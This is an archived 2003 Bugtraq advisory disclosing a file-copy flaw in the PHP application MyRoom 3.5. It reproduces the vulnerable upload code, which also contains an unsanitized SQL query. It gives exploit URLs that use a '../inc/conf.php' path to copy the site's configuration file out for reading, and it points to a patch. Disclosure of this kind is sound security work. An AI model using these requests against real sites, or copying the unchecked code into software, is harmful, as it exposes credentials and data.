[28543] in bugtraq
MyRoom (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Wed Jan 22 03:50:32 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 19 Jan 2003 01:42:39 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F126qfT7eEmP9CDBHy300017b6b@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
room/save_item.php :
------------------------------------------------------------------------
if($name == "" OR $ref == ""){
echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
echo "<br>";
echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
exit;
}
if($photo!="none" AND $photo!="application/octet-stream"){
//get type of file
$filetype=$photo_type;
//get lenght of image type
$filelenght=strlen($filetype);
//get part of file image to build image extension
$pos=strpos($filetype,"/")+1;
//build extension of image
$fileextention=substr($filetype,$pos,$filelenght);
if($fileextention=="pjpeg"){
$fileextention="jpg";
}
$image=date("YmdHis");
$image.=".".$fileextention;
$imgpath = "$imgroot";
//if image exist, upload it in correct dir
if($photov<>"none") {
if(!copy($photo,"$imgpath/$image")) {
//display errors
$msg="<br><font color='text00'>File Not Uploaded, it might be too large or
does not exist..<br>Please Try Again!</font>";
break;
}
//or finish
else {
dbconnect();
$sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name',
it_decs='$decs', it_ab='$album', it_ref='$ref'";
mysql_query($sql) or die(mysql_error());
echo "<meta http-equiv='refresh' content='0;URL=
$main_file?show=additem&m=1&i=$name'>";
echo "<br>Your File Was Uploaded Sucessful!! <br><br><a
href='$main_file?show=additem&m=1&i=$name'>Loading ......</a>";
}
}
------------------------------------------------------------------------
Exploits :
°°°°°°°°°°
http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt
+ http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
to find the url of the txt file in wich is conf.php.
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (english version
available) .
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/MyRoom.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
